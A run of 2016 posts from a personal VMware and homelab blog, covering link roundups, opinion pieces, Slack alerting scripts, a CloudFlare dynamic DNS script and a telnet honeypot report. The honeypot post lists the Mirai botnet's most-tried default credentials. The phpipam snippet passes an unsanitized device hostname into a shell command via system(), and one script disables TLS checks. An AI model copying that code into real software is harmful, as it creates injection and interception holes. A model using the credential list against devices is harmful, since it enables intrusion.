needed, these two are not the same. Setting Up External Access To A Veeam SureBackup Virtual Lab SureBackup is one of the finer features in Veeam Backup & Replication, and Jim Jones goes through how to configure it correctly. GitHub for Newbies - Boston VMware User Group Great presentation by Jonathan Frappier explaining both what Git is, but also why it’s important to know it. As someone who recently did his maiden Github pull request, I can relate to this. Other # vExpert 2017 Applications are Now Open The first round of vExpert applications for 2017 are now open, so if you want to be considered get your application in today. Justin Parisi showed the new NetApp TechONTAP sticker 2.0 on Twitter the other day. Look nice, but when you really look at it – well, it might not be as nice after all. Note to everyone designing stuff like this, please look at it properly. I know it’s supposed to be a headset, but once you see it differently… BBC showed the first episode of Planet Earth II this week, and all I have to say is wow. The filming done in the first episode is just incredible! Check out Iguana vs Snakes and tell me you’re not impressed. Canada and Denmark Fight Over Island With Whisky and Schnapps Good time, but I’ll take the Whisky any day, sorry my Danish friends. Cyberwar This is a TV Series by Viceland, each episode goes through an aspect of cyberwarfare. So far 10 episodes has been aired, and I recommend it. Not for the technical merit, but more for the insight of people host Ben Makuch talk to. That’s it for this week, a new one is in the works for next friday --- # VCSA - The default choice. Always. URL: https://vNinja.net/virtualization/vcsa-the-default-choice-always/ Date: 2016-11-10 Author: christian Tags: vCenter, VCSA, vDM30in30, VMware, vSphere 6.5 I’ve been a big proponent of the VMware vCenter Appliance for a long time, I even did a talk called VCS to VCSA Converter or How a Fling Can Be Good for You! on migrating to the VCSA at the Nordic VMUG last year. The VCSA has gone through a few iterations and versions by now, coinciding with the vSphere releases. History # Since v6.0 scaling has been on par with it’s Windows based counterpart, supporting the same number of hosts and VMs. When it comes to features, VCSA 6.5 surpasses the Windows version. New tools like the Migration Tool, vCenter High Availability, Backup / Restore and the new Management Interface are all exclusively available on the VCSA. In my opinion, the most noteworthy of these are vCenter High Availability and the Backup / Restore options. vCenter High Availability adresses one of the main concerns with vCenter in general since the discontinuation of vCenter Server Heartbeat in June 2014. This new HA setup enables you to have a passive VCSA ready if your active one should fail, with the added protection of a witness that keeps track of it all. This is a native feature of the VCSA, and not available in it’s Windows counterpart (or little brother as it is now…) The Backup / Restore feature is very nice as well. One of the (few) arguments I’ve heard surrounding running the VCSA vs the Windows vCenter is surrounding backup. Thankfully the myth regarding image level backups of it was debunked in v6, but the new backup / restore functionality takes that a step further. Native backup is now available in the VCSA, either via the management interface or via a public API. The backup files (HTTP(s), FTP(s), and SCP transfer protocols are supported) make up the entire VCSA configuration, and you can restore those directly from the VCSA 6.5 ISO image in case of an emergency. This means that you can image level backups of the VCSA as usual, and script the backup file generation as added protection. Also worth noting is that in v6.5, VMware Update Manager has been included in the VCSA, and runs natively on the appliance. The last argument for keeping your Windows vCenter has just disappeared. With the upcoming vSphere 6.5 release it’s clear that the VCSA should be the default deployment model for a new vCenter. There is really no question about it anymore. #migrate2vcsa you should. --- # Using GitBook for Secrets URL: https://vNinja.net/misc/using-gitbook-for-secrets/ Date: 2016-11-08 Author: christian Tags: vDM30in30 A while ago I decided to try and gather a bunch of non-public information in an easy to write and consume fashion. After a bit of fiddling, and testing different potential solutions, GitBook emerged as the best option. By using MarkDown as the markup language, it’s both cross-platform and easy to manage, as the content is nothing but raw text files. GitBook is awesome, no question about it, but in this case I didn’t want the content hosted publicly on gitbook.com. Thankfully, GitBook is available for download as well, so I ended up running that locally on my MacBook. For details on how to run it locally, check out Setup and Installation of GitBook. I then set up a private (free) repository on Bitbucket to host the content. So far this has been a very good experience. Writing content in Markdown is easy and quick, and running this locally makes it easy to check that the edits and additions look like expected in my browser. $ gitbook serve dummy Live reload server started on port: 35729 Press CTRL+C to quit ... info: 7 plugins are installed info: loading plugin "livereload"... OK info: loading plugin "highlight"... OK info: loading plugin "search"... OK info: loading plugin "lunr"... OK info: loading plugin "sharing"... OK info: loading plugin "fontsettings"... OK info: loading plugin "theme-default"... OK info: found 13 pages info: found 8 asset files info: >> generation finished with success in 2.8s ! Starting server ... Serving book on http://localhost:4000 This way I can have my browser open http://localhost:4000 on one screen, and edit the content on my second screen while the browser auto refreshes. Once I’ve added some content I’m happy with, I push the changes back to the Bitbucket repository with my Git client. Once I’m happy with everything, GitBook makes it easy to create PDF and eBook versions for distribution. We happy. --- # My vCenter Web Client Customization URL: https://vNinja.net/virtualization/my-vcenter-web-client-customization/ Date: 2016-11-07 Author: christian Tags: William Lam has a repository of vCenter Web Client customizations hosted over on GitHub, and I decided to add one of my own. Botlady Simple, but kind of fun. Photo credits go to gratisography.com I have a couple of other ideas as well, so I might make a few more, but I’ll wait until vSphere 6.5 is released in case the formats and paths change again. After all the new VCSA is based on VMware Photon, so things might just moved around a bit. --- # What's Really in the Bag? URL: https://vNinja.net/misc/whats-really-in-the-bag/ Date: 2016-11-05 Author: christian Tags: Bag, Everyday, vDM30in30 Since I “launched” my In the Bag series of weekly links yesterday, I figured I should really show what is indeed in the bag. Lifehacker runs a series called Featured Bag and the voyeur in me finds it interesting what other people carry around, and how they organize it. This is my attempt at doing the same. This is my everyday carry, most of these items are always in the bag when I leave the house in the morning. I’ve been using backpacks for years, but noticed I always just carry it around on righ shoulder, so I decided to go for a shoulder bag instead. For the most part this works our fine, if I’m travelling for more than a day, I tend to re-pack in one of the backpacks I have instead. The bag itself is a dbramante1928 Christiansborg which I’m really happy with. Proper leather, and after a couple of months of usage it’s starting to show some patina. MacBook Pro 15" Various Apple dongles (display and ethernet) and cables iPad Mini 4, with a Logitech Keys to Go keyboard Arrow / EMC branded 10000 mAh external battery Logitech R400 presenter Old school paper notebook, with pen Business cards Pens Tiny Leatherman knife/multitool Work access card Bose Quiet Control 25 headset And that’s it. There is still some room for various papers etc. in the pocket on the back of the bag, and some room in the front pocket as well. --- # In The Bag #1 - Week 44 URL: https://vNinja.net/inthebag/in-the-bag-1-week-44/ Date: 2016-11-04 Author: christian Tags: Inspired by Scott Lowe’s Technology Short Takes, Duncan Eppings Recommended Reads and Michael White’s Newsletter here is my attempt at a weekly roundup of things I found interesting the last week or so. I’ve been playing with the idea of doing something like this for a while, but never really got started. Due to participating in (http://discoposse.com/vdm30in30/) this year (30 posts in 30 days is a lot), I figured this was as good a time as any to get started — at least I can get 4 “free” posts out of it. Hopefully I’ll be able to keep it up and post these roundups every friday, at least I’ll give it a good go. Naturally my focus for these will be technology and virtualization, but other random content might pop up as well. I’m still working on the format, and it’ll probably evolve as I get into a workflow. Photo by Sonny Abesamis Anyhow, here it is, the first edition! In The Bag #1 - Week 44 # Technology # Why I moved from NFS to vSAN… and why it went wrong by Patrick Terlisten A perfect example of what you need to consider when designing a vSAN environment, and what happens if you don’t. VMware SDDC Technical Whiteboard by Jad El-Zein Jad has made a really good whiteboard video (wow, VideoScribe looks good) on VMware SDDC. Nicely done! vCenter Server Appliance (VCSA) 6.5 What’s New Rundown by Emad Younis The VCSA is my preferred vCenter implementation model, and now that 6.5 is announced, it’s even more clear that the VCSA should be, and is, the default model going forward. Designing a modern multi-tenant DC network by Myles Gray I’m not a networking guy, but Myles has posted a whopper around designing a DC network. Very well done Myles! Other # Takeoff: The Oral History of Nirvana’s Crossover Moment This is an older post (from May 2015), but I read it this week so it still qualifies. I’m still a big Nirvana fan, and I love reading stories like these. vRockstar 2016 Pictures are online! Pictures from this years vRockstar Party in Barcelona. Good times, and yeah, Sorry. That’s it for the first version, hopefully many more to come in the next weeks and months. --- # Adding Slack Notifications to phpipam URL: https://vNinja.net/virtualization/adding-slack-notifications-to-phpipam/ Date: 2016-11-03 Author: christian Tags: As mentioned before, I’ve kinda turned my home lab into some sort of Slack-Ops deal, where various services in my home lab notify me of events in a private Slack channel. The latest rendition of that, is adding Slack notifications from phpipam. Once phpipam detects a new device picking up an IP in my network, it notifies me like this: In order to get this working, I had to edit the /var/www/phpipam/functions/scripts/discoveryCheck.php file in phpipam. discoveryCheck.php is the script that is run when phpipam does local subnet discovery check, so this was a natural place to add my custom curl command. I added the following code on line 254 in that file, just below the code block that ends with $Addresses->modify_address($values); // Log to Slack -- Run custom CURL script $command = "curl -s -X POST -H \"Content-type: application/json\" --data '{\"text\":\"$values[lastSeen] - new host autodiscovered: IP: $ip Hostname: $values[dns_name] \"} https://[WEBHOOK URL]"; system($command); Replace [WEBHOOK URL] with your actual URL. For more details on how to set up a webhook URL, check Logging SSH logins to Slack. Pretty easy to do locally, but it would be nice of the phpipam developers could make alerting to third party services a native feature - I’m sure there are other use cases for this as well. --- # Running telnetlogger on my home IP URL: https://vNinja.net/virtualization/running-telnetlogger-on-my-home-ip/ Date: 2016-11-02 Author: christian Tags: Robert Graham of erratasec has created a small honeypot tool called telnetlogger. This is a simple program to log login attempts on Telnet (port 23). It's designed to track the Mirai botnet. Right now (Oct 23, 2016) infected Mirai machines from around the world are trying to connect to Telnet on every IP address about once per minute. This program logs both which IP addresses are doing the attempts, and which passwords they are using. For those still unaware of what the Mirai botnet is, it’s basically malware that scans for vulnerable devices with port 23 (telnet) open to the outside world, and tries to log on with known hardcoded credentials. Compromised devices have then been used to launch some of the largest DDoS attacks seen to date. For more details, check out Breaking Down Mirai: An IoT DDoS Botnet Analysis and Double-dip Internet-of-Things botnet attack felt across the Internet Photo credit: gratisography.com Yes, Mirai is not your grandmothers botnet. I figured it would be a nice little thing to try out, so I spun up a small Linux VM, compiled telnetlogger telnetlogger, ran it and opened inbound port 23 (telnet) on my firewall at home. And guess what, it took all of 1 second before I saw the first connection attempt! I let the honeypot service run for a few hours (about 8 or so), and here are the results, as aggregated by HoneyCredIPTracker by Daniel Miessler Top connection attempts, sorted by country # 36 TW 32 VN 28 BR 26 TR 22 IN 18 RU 14 UA 12 US 12 CN 8 PK 8 MX 8 FR 6 TT 6 PL 6 KR 4 TH 4 SE 4 RO 4 PY 4 MG 4 KH 4 IR 4 GB 4 CR 4 CA Top Attempted Credentials # 415 root xc3511 410 root vizxv 385 root admin 255 admin password 250 admin admin 240 root root 235 root 888888 215 root 123456 175 root default 170 root juantech 170 root 54321 165 support support 155 root xmhdipc 130 admin admin1234 125 guest guest 120 root Zte521 120 root 12345 115 root klv123 100 admin smcadmin 95 root anko 90 root GM8182 90 root 1234 90 root 1111 80 root pass 75 guest 12345 In those 7 hours this was running, I saw a total of 15785 connection attempts, a connection attempt every 1.8 seconds - on average. I guess it’s best to close port 23 again, for good this time. Hat tip to a former colleague of mine, security afficionado and all around great guy Per Thorsheim for letting me know about this tool. --- # VMworld Europe 2016 - My takeaways URL: https://vNinja.net/vmware-2/vmworld-europe-2016-my-takeaways/ Date: 2016-10-31 Author: christian Tags: conference, vDM30in30, VMware, vmworld VMworld Europe 2016 in Barcelona is a couple of weeks old now, and most of the dust has settled. Besides the general announcements around vSphere 6.5 and surrounding products, the next big thing might just be Cross-Cloud Architecture and of course VMware Cloud on AWS. The announcements around vSAN 6.5 (yes, it is now vSAN and not Virtual SAN/VSAN anymore), are also very interesting. Perhaps it’s time I revisit my earlier VMware VSAN; More than meets the eye post and update it for vSAN 6.5? What really stands out after having time to digest it, is how VMware and VMworld felt energetic again. The keynotes were good, especially on day 1. That keynote is probably the best VMware keynote I’ve ever seen. Everything VMware has been talking about for years, perhaps without actually being able to get the message clearly across to everyone, seems to click neatly into place now. There is a vision now, a vision you can actually relate to, and believe in. Even the tagline_ be_tomorrow_, makes more sense now. I don’t know if anyone else has noticed, but it feels like something has changed internally in VMware in the last year and a half or so. There seems to be a new drive, a clearer focus. To be frank, it feels fun again, something it really hasn’t for the last couple of years. As per usual, my biggest take-away from attending VMworld is networking and talking to real life people — The same people I “talk” to virtually all the time. I even met quite a few new people this year, and that’s always awesome! My Session highlights # I attended a few sessions too, and would like to highlight two of them: SDDC8414 - VMware Validated Design for SDDC: A Technical Deep Dive INF7849R - VMware Cloud on AWS – A Closer Look Both these sessions were awesome. If you work as an architect and haven’t had a look at VMware Validated Designs yet, drop what you’re doing and go have a look. Right now. VMware Cloud on AWS was a little light on details (naturally, since it’s not even released/available yet) but for now this one gave a really good overview of what is is, and perhaps more crucially what it isn’t. Other highlights # As a VMUG Leader I attended the VMUG Leader Lunch, which had an awesome Q&A session with Pat Gelsinger and Joe Baguley — That session should have been recorded too. I met up with Ed and Chris, all three hosts of vSoup were finally in the same city at the same time, for the first time since 2011! We recorded a quick vSoup Podcast, and even got Emad Younis as a surprise guest. That recording is still unreleased, hopefully we can get the audio cleaned up and it published pretty soon. Overall # VMworld 2016 has left me happy. Happy with the direction VMware is going, happy with the event and really happy I wore that shirt for the vRockstar party. As a side note, my FitBit logged 108,427 steps while I was in Barcelona, not to bad for under a weeks worth of conference. Now, can someone tell me where VMworld Europe 2017 will be held? --- # Me too: VMware Cloud™ on AWS URL: https://vNinja.net/news/me-too-vmware-cloud-on-aws/ Date: 2016-10-14 Author: christian Tags: AWS, Cloud, Speculation, VMware After yesterdays announcement of VMware Cloud™ on AWS everyone and their distant relatives have published their opinion pieces on the relevance of the deal, and what who got the short end of the stick in this deal. I guess this is my attempt, or me too post if you will. First off, the best source for actual facts and not conjecture, besides the press releases and actual announcement, is Frank Denneman’s VMware Cloud™ on AWS – A Closer Look post (and by the way, it just feels right that Frank is back at VMware). So far, not many details are available (naturally, since it’s a tech preview that hasn’t even entered the beta stage yet), but we know this: It’s not a nested environment, it’s VMware SDDC running on physical hardware hosted in amazon data centers. Your “old” management tools will be supported. Use VDP for backup, or PowerCLI to manage your environment? You can continue to do so, even if the workloads run in AWS. vMotion will be supported, making it possible to migrate workloads directly. AWS provides the hardware, VMware provides the stack and supports it. So far, so good. Being able to run some of your services on AWS, without conversion, makes sense. But that’s not really all that different (yes, there are probably subtle differences but still) from vCloud Air, Softlayer or any of the vCAN partners. There might be a difference in pricing, but that’s unknown for now. My take on it is as follows: What has been announced now is basically a private cloud operating in a public cloud, enabling you to create a hybrid cloud. At the moment it’s missing direct integration with existing aws services (other than workload proximity lowering latency). Elastic Scaling is the new name for Cloudbursting. But as far as I can see, this is just the beginning. A lot of comments on this take the view that this is this is a short-term gain for VMware, but a long-term gain for aws. If anyone thinks that Jeff Bezos and Pat Gelsinger only thinks 6-12 months ahead, they need to get their head checked. This is a long term play by both parties, no doubt about it. Look at what VMware is doing with containers. Look at what aws is doing with their cloud services. Now tell me that their only thoughts are short-term. I have no inside information about what is going on here, but Elastic Scaling (or ElasticDRS) sounds like it might be really interesting. The ability to move workloads to AWS on demand, if you exhaust your local resources? Price it like S3, with low cost availability of resources that costs (a lot) more if used. It’s a move from CAPEX to OPEX anyway, and might make larger scale infrastructures easier to consume for the people in accounting. Of course, this is aimed as a competing resource to Azure. That’s the common enemy that makes AWS and VMware combine their forces. AWS has a massive advantage in cloud services, VMware owns most local datacenters. And lets not kid ourselves, not all applications are going to be cloud applications. There are still a lot of mainframes out there, that in theory should have been replaced by x86 workloads years ago. The fact is that even though technology evolves, we still run around managing technical debt up the wazoo. Not having to run “legacy” x86 workloads in your local DC, is a big deal. In that regard the AWS deal offers nothing you couldn’t already get through other avenues, but having the AWS name behind it ticks a lot of boxes. The combination of these two, as the service offering evolve, is going to be interesting. Really, really interesting, and what has been announced so far is just the beginning. I’ll offer one small piece of advice in the end here, start learning AWS tools and infrastructure. You as a seasoned VMware veteran, or architect, will need it in the not so distant future. Trust me on this. --- # macOS: Secure Pipes URL: https://vNinja.net/osx/macos-secure-pipes/ Date: 2016-10-14 Author: christian Tags: macOS, Proxy, SSH, Tunnels Since I set up a public jumphost for my homelab/network, I’ve been looking for an easy way to manage my SSH tunnels. After trying a couple of different managers, I’ve chosen to use Secure Pipes. This little piece of free software allows you to easily manage SSH tunnels, with features like Remote Forwards, Local Forwards and SOCKS proxies. It runs in the toolbar, and makes connections easily available. It even reconfigures your network settings to use the SOCKS proxy, if allowed to. It also uses my private ssh keys to authenticate to the jumphost, which makes me a happy user. Free and easy to use, what’s not to love? --- # Patch those Dell Servers easily! URL: https://vNinja.net/hardware/patch-those-dell-servers-easily/ Date: 2016-10-10 Author: christian Tags: Dell, Patching, Server, Update Did you know that Dell has a bootable linux ISO with firmware upgrades for their servers available? Neither did I, but luckily I found it today when needing it at a customer site. Check out Updating Dell PowerEdge servers via bootable media / ISO where you can download bootable ISOs for specific server models, and get all your firmware upgraded in one fell swoop. Be warned though, it takes quite some time to run though it all (125 update packages in this instance), but it sure beats installing manually or creating your own bootable ISO with the Dell Repository Manager or even using Dell Server Update Utility. Especially when it’s been a while since the server has been patched, the ones I used this on had not been touched since 2012… Fire and forget via iDRAC, I can like that. Just make sure you update the iDRAC before you boot the ISO, or you might just get disconnected mid-way, and have to start over. --- # Logging SSH logins to Slack URL: https://vNinja.net/homelab/logging-ssh-logins-to-slack/ Date: 2016-10-06 Author: christian Tags: Awesome, Homelab, HomeLabOps, Slack I’m using Slack to alert and log a few things in my environment, and one of the things I use it for is to alert me if someone logs on via SSH to my public facing Jumphost. For a good walkthrough on how to set up such a host, check out Tunnel all your remote connections through ssh with a linux jumpbox by Luca Dell’Oca. My Ubuntu 16.04 Jumphost is set up to only accept Key-Based Authentication, to secure it as much as possible, but I would still like to get instant notification if someone logs into it interactively. How to set up SSH login notification to Slack # First of all, we need an Incoming WebHook in Slack in order to receive the notifications. You configure those from the **Apps & Integration **menu item. This in turn opens up the Slack App Directory, find Build on the top right and then choose Make a Custom Integration. One your are in the Build a Custom Integration section, find (or search) Incoming WebHooks and select that. Next up, define which Slack channel should be the integration point, and click on Add Incoming WebHooks integration. Copy the Webhook URL presented on the next screen Note: keep this one a secret, anyone with access to this URL will be able to post to your Slack channel. On my Ubuntu 16.04 Linux jumphost I’ve created a small bash script called /etc/ssh/notify.sh. This script utilizes _curl _ and the WebHook URL to post information directly to Slack. The script looks like this: notify.sh #!/bin/sh url="https://hooks.slack.com/services/*********" channel="#messages" host="`hostname`" content="\"attachments\": [ { \"mrkdwn_in\": [\"text\", \"fallback\"], \"fallback\": \"SSH login: $USER connected to \`$host\`\", \"text\": \"SSH login to \`$host\`\", \"fields\": [ { \"title\": \"User\", \"value\": \"$USER\", \"short\": true }, { \"title\": \"IP Address\", \"value\": \"$SSH_CLIENT\", \"short\": true } ], \"color\": \"#F35A00\" } ]" curl -s -X POST --data-urlencode "payload={\"channel\": \"$channel\", \"mrkdwn\": true, \"username\": \"ssh-bot\", $content, \"icon_emoji\": \":computer:\"}" $url /bin/bash Replace the the WebHook URL with your own from step 4 and which channel to post to and you should be ready to go. This script logs the username and the IP address the connection comes from, and then posts it to the Slack WebHook with the help of curl. Note: I’ve chosen to include the WebHook name etc in the script itself, instead of via the WebHook definition on Slack, mostly since I don’t want to create a WebHook for all hosts I want logging from. With this setup, I can just change the username part of the _curl _command. It already logs the hostname, so this is pretty much superficial, but hey, that’s how I made it. chmod +x /etc/ssh/notify.sh to make it executable, and test it. If everything works as expected, you should see an immediate log entry in your chosen Slack channel. On order to make this script runs every time someone logs into the Jumphost, I added a ForceCommand to the end of my_ /etc/ssh/sshd_config _file, like this: ForceCommand /etc/ssh/notify.sh And that’s it. A login via SSH on the Jumphost now looks like this in my Slack channel: How awesome is that? Of course, this just scratches the surface of what is possible with Slack’s Incoming WebHooks, I’m using a similar approach for logging new devices discovered in phpmyipam but that’s for another post. --- # HomeLabOps via Slack URL: https://vNinja.net/homelab/homelabops-via-slack/ Date: 2016-10-06 Author: christian Tags: Alerting, fun, Slack, Webhook Just like Lior Kamrat I’ve set up my own private Slack for messaging and alerting from various services running both in my lab and some external facing services. It’s only been running a few days, but so far it works brilliantly and helps me keep track. So far, I’ve set up Slack alerting and/or integrations for the following items: StatusCake monitoring for vNinja.net and other public facing web services Todoist integration Pocket: New items added to Pocket gets announced via Zapier. Incoming Slack webhooks Windows application that sends status messages phpipam: If a new device is detected in my local network, send a notification Jumphost: Just like Luca I have a public facing Linux JumpHost that I tunnel traffic through. I’ve set up an alerting mechanism that sends a Slack notification if someone logs into the JumpHost. If my public IP changes, it gets updated and Slack gets notified. Wordpress events, like new posts or comments are also announced via the WP-Slack plugin. I’m sure I’ll add other things to this as time passes. I plan on publishing something on how I’ve hacked some of this together, I just need to clean up the code a bit and make it ready for publication first. --- # VMworld 2016 Europe URL: https://vNinja.net/virtualization/vmworld-2016-europe/ Date: 2016-10-06 Author: christian Tags: Barcelona, conference, vmworld VMworld Europe is just a couple of weeks away now, and I can’t wait to spend a week in sunny Barcelona. Last year my trip got cancelled in the last minute, but that will not be the case this year. As usual I’m looking forward to a bunch of sessions, and general announcements, but for me the value of attending VMworld is in the networking with other people. Sessions and keynotes can be reviewed later, interacting with others can not. A lot of the people I get to meet while at VMworld are people I interact with often, but seldom meet face to face. For me, that is the true, and perhaps somewhat hidden, value of attending. Tech skills are great, but it’s the soft skills that makes you stand out. So, come look for me in at the blogger table and say hi! I suspect that’s where I’ll spend the most of my time. --- # Goodbye PernixData FVP and Architect URL: https://vNinja.net/news/goodbye-fvp-and-architect/ Date: 2016-09-29 Author: christian Tags: Nutanix, PernixData As we all know by now, PernixData was gobbled up by Nutanix a while back, and since then there has been a nothing but silence on the future of the FVP and Architect products. Now it seems it’s over. The acquisition trigged a bunch of PernixData employees moving elsewhere, and now it’s the products time to move on as well. From what I’m hearing, End of Sale and End of Life for both products are due to be announced soon. Existing support contracts will be honored, but will not be renewable beyond the current time frame. By the looks of it FVP and/or Architect will be built into the Nutanix stack, and not be available as standalone products anymore. I’ve been a huge supporter of PernixData FVP, and even implemented some of the first solutions delivered in Norway, and I’m really sad to see it disappear as an independent solution. --- # CloudFlare Dynamic DNS Update Script (cf-ddns.sh) URL: https://vNinja.net/homelab/cloudflare-dynamic-dns-update-script-cf-ddns-sh/ Date: 2016-08-13 Author: christian Tags: Bash, Cloudflare, Dynamic DNS, Homelab, Scripting As a part of my Homelab project, I’ve created a proper bash script to provide dynamic DNS updates for external resources, via CloudFlare. More details on the reasoning behind it can be found in Using CloudFlare for Dynamic DNS, but since that was posted I’ve fleshed the script out quite a bit more. The new and updated script can be found on GitHub: cf-ddns.sh. It now writes events to syslog when it runs, so you can use VMware Log Insight (or another log solution) to capture the events, and use it to track public IP changes if you want. I’ve also added a -f parameter to it, so you can force an IP update even if the values have not changed since the last run. It’s pretty self explanatory, just replace your own values from CloudFlare for the variables, and if you want to update more than one record, just copy the update block and edit it for the extra entries. Hopefully someone will find this useful. --- # Using CloudFlare for Dynamic DNS URL: https://vNinja.net/homelab/using-cloudflare-for-dynamic-dns/ Date: 2016-08-09 Author: christian Tags: API, Cloudflare, DNS, Dynamic DNS, Homelab, Scripting In my previous post, I tried to lay out the foundation and reasoning behind requiring a Dynamic DNS Service, and here is how I solved it using CloudFlare. First of all, I moved my chosen domain name to CloudFlare, and made sure everything resolved ok with static records. Once that was working, I started playing around with the CloudFlare API, using Cocoa Rest Client. I’m no developer (as is probably very apparent by the script below), nor API wizard of any kind, but it was fairly easy figuring out how to craft a request that lists my DNS zone. By using the List DNS Records query, I found the unique ID for the hostnames I wanted to update, and created a new Update DNS record query to update it with a new IP address. Since the Cocoa Rest Client is pretty clever, it has an option to “Copy Curl Command”, that basically gives you a preformatted curl command to run the query you just crafted in it. Pasting that into a Terminal window on my Mac, verified that it worked as intended. From there on, I simply wrapped these commands in a little bash script, to avoid hitting the API unless there was an actual public IP change. In the end, my script ended up looking like this. UPDATE: # I’ve published a more fleshed out script on GitHub, details here. NOTE: You will need to fill out your own values for {TOKEN}, {EMAIL}, {DOMAIN}, {ID} and {HOSTNAME} in line 18 and 21 for this to work for you. cloudflare-ddns.sh #!/bin/sh #get public ip MYIP=$(curl ifconfig.me/ip) OLDIP=`cat oldip.txt` echo "Current public IP is:" $MYIP if [ "$MYIP" = "$OLDIP" ] then echo "No change detected. Exiting" else echo "IP change detected, updating CloudFlare" #WEB01 curl -k -L -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'a=rec_edit&tkn={TOKEN}&email={EMAIL}&z={DOMAIN}&id={ID}&type=A&name={HOSTNAME}&ttl=1&content='$MYIP 'https://www.cloudflare.com/api_json.html' #WEB02 curl -k -L -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'a=rec_edit&tkn={TOKEN}&email={EMAIL}&z={DOMAIN}&id={ID}&type=A&name={HOSTNAME}&ttl=1&content='$MYIP 'https://www.cloudflare.com/api_json.html' echo $MYIP > oldip.txt fi Explanation # First off, the script checks what the current public IP is (line 5), then goes on to compare that with the stored IP address in the oldip.txt file (line 10). If it matches, it ends execution as there is no need to update the public records. If there is a mismatch between the two, it goes on to execute the request to CloudFlare, replacing the currently configured IP with the new IP address stored in the $MYIP variable (lines 17-21). It then writes the new IP address to the oldip.txt file (line 23) and exits. Configure this as a cronjob the runs every 5 - 10 minutes or so and you’re set! Simple, not pretty, but oh-so awesome! --- # Dynamic DNS Requirements URL: https://vNinja.net/homelab/dynamic-dns-requirements/ Date: 2016-08-09 Author: christian Tags: Cloudflare, DNS, Dynamic DNS, Homelab, Scripting While working on my new Homelab setup, I’ve been investigating ways to provide hostname based access to several web services located in my DMZ zone. Since my provider doesn’t provide static IP addresses, I also need an external Dynamic DNS service, to provide said hostname mappings through the reverse proxy on the inside. There are loads of Dynamic DNS services available, most of them lets you use some sort of predefined domain name scheme, and point it to your external IP, but I wanted to use a domain name that I own and control. Since I use CloudFlare to provide DNS services (amongst other things) for this very site, it was a natural choice to see if they could fit the bill for my lab needs as well. Turns out, not only can they provide the services I need for free, they also allow me to play around and have fun at the same time! My setup looks like this # Logical Web Services Access Diagram As seen in the diagram, the setup is pretty simple. As far as Dynamic DNS requirements go, all I need to be able to do (for now) is to update the IP address for a couple of A records for my domain, if my external IP changes. This in turn makes the reverse proxy work, since it redirects traffic based on hostname when there is an incoming request. CloudFlare offers several methods to update the records, including ddclient, but that requires Perl, and frankly that’s no fun at all. What it fun however, is to update A records directly through the CloudFlare API, so that’s the route I headed down. I moved the domain name I want to use for external access to my lab, to CloudFlare and rolled my own small Dynamic DNS Updater all within an hour or so of actual work. Not bad at all, especially considering I didn’t even know they provided the possibility to do so, or that they provide a public API you can play with. In the next post in this series, I’ll show how I solved it with some simple API calls and some bash scripting. --- # Veeam vCenter Migration Utility URL: https://vNinja.net/virtualization/veeam-vcenter-migration-utility/ Date: 2016-08-08 Author: christian Tags: Backup, Backup & Replication, MoRef, vCenter, Veeam Way back in 2013, I published Preserve your Veeam B&R Backups Jobs when Moving vCenter, outlining how to “cheat” (by using a CNAME alias) to preserve your Veeam Backup & Replication jobs if you replace your VMware vCenter. Naturally, when there is a new vCenter instance, all the Virtual Machine Managed Object Reference’s (MoRef) change, which makes Veeam Backup & Replication start a new backup/replication chain, since all VMs are treated as new ones. Not ideal by any means, but at least you wouldn’t have to recreate all your jobs. Veeam has now made a tool available that can map old MoRef’s to new MoRef’s in your backup jobs, in order to keep your incremental chains intact even after replacing your vCenter. Check out vCenter Migration Utility! --- # Taking IT too Far URL: https://vNinja.net/news/taking-it-to-far/ Date: 2016-07-19 Author: christian Tags: A few days ago I decided to go full-on mad scientist in documenting my new home lab / network setup, and I’ve even created a GitHub repository for it. The idea is to create a framework for developing this kind of documentation, heavily influenced by the VCDX methodology and framework. Over time, Conceptual, Logical and Physical designs will be added, as well as configuration settings and operational procedures. Hopefully it’ll also contain some useful diagrams. There are even Executive Summary and Business Background sections, which admittedly makes no sense at all in this setting, but as an exercise in writing such documents they certainly serve a purpose. It’s built using Markdown as the markup language, which makes it easy to edit, revise and ultimately maintain as a source controlled collection of documents. This is very much a work in progress, but if you have any input, criticisms or pure snark, bring it on! Of course, since this is my own personal home lab, it’s not quite up to par as a real enterprise architecture, but it’s still real to me. Now, where is my lab coat again? --- # Top vBlog 2016: Thank you! URL: https://vNinja.net/news/top-vblog-2016-thank-you/ Date: 2016-07-09 Author: christian Tags: contest, Happy Dance, TopvBlog While I was away on a two week holiday on the Croatia’s sunny Makarska Rivijera, Eric Siebert announced the result of his annual Top vBlog, and much to my surprise vNinja did quite the jump from last years 46th spot to this years 27th! Honestly, I thought the site would drop out of the the top 50 list this year, but once again I’m proven to be mistaken. Some times being wrong is just great! Not only that, but in the Favorite Independent Blogger category, I also did a small hop from 7th to 6th. Obviously this makes me very happy, and I wish to thank everyone who voted for the site this year Also, if you happen to meet Eric at VMworld, or anywhere else this year, buy the guy a beer. Or three. He like totally deserves it. --- # vSphere Platform Services Controller (PSC) topology and Omnigraffle URL: https://vNinja.net/virtualization/vsphere-platform-services-controller-psc-topology-and-omnigraffle/ Date: 2016-05-22 Author: christian Tags: automation, Omnigraffle, PSC, Script, Topology, vSphere A little while ago William Lam published a little python script called extract_vsphere_deployment_topology.py that basically lets you export your current vSphere PSC topology as a DOT (graph description language) file. Great stuff, and in itself useful as is, especially if you run it through webgraphviz.com as William suggests. The thing is, you might want to edit the topology map, change colours and fonts, and even move the boxes around, after you get the output. If you have a large environment, you might want to combine all your PSC topologies into a single document? It turns out, that’s pretty easy to do! Omnigraffle Pro imports the DOT files natively, and lets you play around with the objects as if they were drawn in Omnigraffle from the beginning. Save the output from the script somewhere as a .dot file. Then open Omnigraffle and go to File -> Open and select the file. Now, select the Hierarchical option, and you’ll get a nicely formatted canvas with your PSC components already laid out inside of Omnigraffle. Now you can edit it at will! As far as I can tell, this isn’t possible with Microsoft Visio, as it doesn’t support the DOT format, but you could always save it as a Visio file with Omnigraffle if you need to sent it to your more Microsoft inclined friends. I’m sure there are more fun to be had with these DOT files, it’s just text files after all, perhaps someone can even code up a script that converts them to Visio .vdx files or some other format that Visio can import natively. --- # Let's get the kids some RPi's! URL: https://vNinja.net/news/lets-get-the-kids-some-rpis/ Date: 2016-05-06 Author: christian Tags: Awesome, Donation, Kids, RPi A friend of Mr. Jase McCarty is teaching a class in programming control systems, and is in need of a few Raspberry Pi’s. Sadly the school can’t afford buying them outright, so if you have one laying around, that you are not using, get in touch with Jase and he’ll set you up with the details on how you can contribute! If you want to do even better, and buy some RPi’s outright and donate them 